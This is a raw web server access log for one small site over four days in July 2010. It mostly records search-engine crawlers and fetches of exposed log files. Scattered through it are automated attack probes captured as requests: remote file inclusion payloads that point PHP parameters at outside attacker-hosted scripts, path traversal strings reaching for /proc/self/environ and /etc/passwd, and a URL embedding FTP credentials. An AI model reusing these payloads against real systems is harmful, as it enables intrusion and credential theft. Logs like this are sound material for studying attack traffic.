95.108.150.235 - - [05/Jul/2010:06:17:51 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [05/Jul/2010:06:17:52 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
209.172.35.118 - - [05/Jul/2010:08:05:56 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
209.172.35.118 - - [05/Jul/2010:08:05:56 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
209.172.35.118 - - [05/Jul/2010:08:05:56 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
209.172.35.118 - - [05/Jul/2010:08:05:56 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
95.108.142.138 - - [05/Jul/2010:10:40:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [05/Jul/2010:10:40:51 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [05/Jul/2010:10:40:52 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [05/Jul/2010:10:40:52 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [05/Jul/2010:10:40:53 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [05/Jul/2010:10:40:54 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
77.88.31.246 - - [05/Jul/2010:11:02:18 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [05/Jul/2010:11:28:04 -0700] "GET /logs/access_100220.log HTTP/1.0" 200 78076 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
208.80.193.35 - - [05/Jul/2010:11:31:05 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; CDsource=v2.15e.02; YPC 3.2.0)" "virtualsupplynet.com"
67.195.115.249 - - [05/Jul/2010:11:52:36 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [05/Jul/2010:11:52:37 -0700] "GET /logs/access_100605.log HTTP/1.0" 200 125664 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
77.88.31.246 - - [05/Jul/2010:15:09:19 -0700] "GET /logs/access_100213.log HTTP/1.1" 200 76637 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
118.127.16.179 - - [05/Jul/2010:15:48:14 -0700] "GET /logs//My_eGallery/index.php?basepath=http://leah.fileave.com/wetwork/Ckrid2.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
118.127.16.179 - - [05/Jul/2010:15:48:15 -0700] "GET /My_eGallery/index.php?basepath=http://leah.fileave.com/wetwork/Ckrid2.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
88.250.57.232 - - [05/Jul/2010:16:38:34 -0700] "GET /logs/access_100704.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [05/Jul/2010:16:38:34 -0700] "GET /logs/access_100705.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
192.228.230.3 - - [05/Jul/2010:19:04:30 -0700] "GET /logs/access.log HTTP/1.1" 200 28118 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
77.88.31.246 - - [05/Jul/2010:20:10:56 -0700] "GET /logs/access_100619.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [05/Jul/2010:21:31:39 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [05/Jul/2010:21:31:40 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
94.76.244.219 - - [05/Jul/2010:21:56:12 -0700] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
94.76.244.219 - - [05/Jul/2010:21:56:43 -0700] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
117.53.96.161 - - [05/Jul/2010:23:23:38 -0700] "HEAD / HTTP/1.0" 200 0 "http://www.virtualsupplynet.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.virtualsupplynet.com"
187.10.121.42 - - [06/Jul/2010:00:28:29 -0700] "GET /logs/access_100515.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/up.php? HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
77.88.31.246 - - [06/Jul/2010:02:19:15 -0700] "GET /logs/access_100220.log HTTP/1.1" 200 78076 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
193.231.187.33 - - [06/Jul/2010:02:59:48 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
193.231.187.33 - - [06/Jul/2010:02:59:48 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
75.42.193.142 - - [06/Jul/2010:03:46:15 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
75.42.193.142 - - [06/Jul/2010:03:46:16 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
208.80.193.34 - - [06/Jul/2010:04:45:05 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.2.1.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:08 -0700] "HEAD /logs/ HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:08 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:20 -0700] "HEAD /logs/access.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:21 -0700] "GET /logs/access.log HTTP/1.1" 206 31307 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:21 -0700] "HEAD /logs/access_100213.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:21 -0700] "HEAD /logs/access_100220.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:22 -0700] "HEAD /logs/access_100227.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:22 -0700] "HEAD /logs/access_100306.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:22 -0700] "HEAD /logs/access_100313.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:22 -0700] "HEAD /logs/access_100320.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:22 -0700] "HEAD /logs/access_100327.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:23 -0700] "HEAD /logs/access_100403.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:23 -0700] "HEAD /logs/access_100410.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:23 -0700] "HEAD /logs/access_100417.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:23 -0700] "HEAD /logs/access_100424.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:24 -0700] "HEAD /logs/access_100501.log HTTP/1.0" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:24 -0700] "HEAD /logs/access_100508.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:24 -0700] "HEAD /logs/access_100515.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:24 -0700] "HEAD /logs/access_100522.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:24 -0700] "HEAD /logs/access_100529.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:25 -0700] "HEAD /logs/access_100605.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:25 -0700] "HEAD /logs/access_100612.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:25 -0700] "HEAD /logs/access_100619.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:25 -0700] "HEAD /logs/access_100626.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:26 -0700] "HEAD /logs/access_100703.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:26 -0700] "GET /logs/access_100703.log HTTP/1.1" 206 96073 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [06/Jul/2010:07:23:26 -0700] "HEAD /logs/scripts.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
66.135.41.16 - - [06/Jul/2010:07:32:16 -0700] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.urko.net/logs/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
66.135.41.16 - - [06/Jul/2010:07:32:16 -0700] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.urko.net/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
66.135.41.16 - - [06/Jul/2010:07:32:16 -0700] "GET /logs/access_100206.log%20%20//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.urko.net/logs/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
77.88.31.246 - - [06/Jul/2010:08:29:15 -0700] "GET /logs/access_100703.log HTTP/1.1" 200 96073 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
222.236.47.182 - - [06/Jul/2010:12:17:18 -0700] "GET /logs//index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [06/Jul/2010:12:17:19 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [06/Jul/2010:12:17:20 -0700] "GET /logs//index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [06/Jul/2010:12:17:21 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
208.80.193.39 - - [06/Jul/2010:15:32:35 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.1.4322; ZangoToolbar 4.8.2)" "virtualsupplynet.com"
67.195.110.174 - - [06/Jul/2010:15:40:36 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [06/Jul/2010:15:40:37 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
88.250.57.232 - - [06/Jul/2010:16:38:58 -0700] "GET /logs/access_100705.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [06/Jul/2010:16:38:59 -0700] "GET /logs/access_100706.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:45:04 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:46:48 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:48:45 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:50:35 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:52:34 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:54:57 -0700] "GET /?M=D HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:56:19 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:16:59:09 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:00:31 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:02:06 -0700] "GET /logs/?M=A HTTP/1.1" 200 3798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:03:44 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:05:37 -0700] "GET /logs/?N=D HTTP/1.1" 200 3798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:07:04 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1498 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:08:31 -0700] "GET /logs/access_091010.log HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:09:55 -0700] "GET /logs/access_090829.log HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
116.48.51.30 - - [06/Jul/2010:17:11:30 -0700] "GET /?D=D HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
192.228.230.3 - - [06/Jul/2010:18:59:04 -0700] "GET /logs/access.log HTTP/1.1" 200 40916 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
95.130.10.37 - - [06/Jul/2010:20:32:17 -0700] "GET /robots.txt HTTP/1.1" 404 - "http://www.virtualqumran.com/robots.txt" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
95.130.10.37 - - [06/Jul/2010:20:32:18 -0700] "GET /robots.txt HTTP/1.1" 404 - "http://www.virtualqumran.com/robots.txt" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
77.88.31.246 - - [06/Jul/2010:21:28:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [07/Jul/2010:02:43:34 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
216.55.143.237 - - [07/Jul/2010:07:04:28 -0700] "GET /logs/?option=com_sefhttp://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt? HTTP/1.1" 200 3798 "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
216.55.143.237 - - [07/Jul/2010:07:04:28 -0700] "GET /?option=com_sefhttp://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
77.88.31.246 - - [07/Jul/2010:07:56:37 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
113.30.66.24 - - [07/Jul/2010:08:19:21 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
113.30.66.24 - - [07/Jul/2010:08:19:21 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
67.195.115.249 - - [07/Jul/2010:12:23:04 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [07/Jul/2010:12:23:04 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
208.80.193.42 - - [07/Jul/2010:12:31:42 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; RCP000.009.00510/666ea6da9aa04eed5280d4acfea3bcdd; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.virtualsupplynet.com"
66.249.65.133 - - [07/Jul/2010:12:34:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
77.88.31.246 - - [07/Jul/2010:14:15:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [07/Jul/2010:14:36:03 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [07/Jul/2010:14:36:15 -0700] "GET /logs/access_100515.log HTTP/1.0" 200 147627 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/Jul/2010:16:07:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/Jul/2010:16:07:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [07/Jul/2010:16:07:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [07/Jul/2010:16:07:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/Jul/2010:16:07:34 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [07/Jul/2010:16:07:34 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
88.250.57.232 - - [07/Jul/2010:16:37:52 -0700] "GET /logs/access_100706.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [07/Jul/2010:16:37:53 -0700] "GET /logs/access_100707.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
67.195.110.174 - - [07/Jul/2010:17:40:40 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
66.249.65.175 - - [07/Jul/2010:19:37:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
208.80.193.121 - - [07/Jul/2010:22:09:16 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; ZangoToolbar 4.8.2; .NET CLR 2.0.50727)" "virtualsupplynet.com"
207.46.195.223 - - [08/Jul/2010:00:28:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.195.223 - - [08/Jul/2010:00:30:03 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
187.45.233.166 - - [08/Jul/2010:01:26:50 -0700] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
192.228.230.3 - - [08/Jul/2010:01:31:34 -0700] "GET /logs/access.log HTTP/1.1" 200 46853 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
77.221.137.18 - - [08/Jul/2010:03:00:19 -0700] "GET /logs/access_100522.log/export.php?mosConfig_absolute_path=http://giou.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
77.221.137.18 - - [08/Jul/2010:03:00:20 -0700] "GET /export.php?mosConfig_absolute_path=http://giou.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
77.221.137.18 - - [08/Jul/2010:03:00:20 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://giou.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
187.45.193.143 - - [08/Jul/2010:10:02:44 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
187.45.193.143 - - [08/Jul/2010:10:02:45 -0700] "GET /index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
187.45.193.143 - - [08/Jul/2010:10:02:46 -0700] "GET /logs/index.php?option=com_gcalendar../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
211.210.38.8 - - [08/Jul/2010:12:16:04 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
211.210.38.8 - - [08/Jul/2010:12:16:05 -0700] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
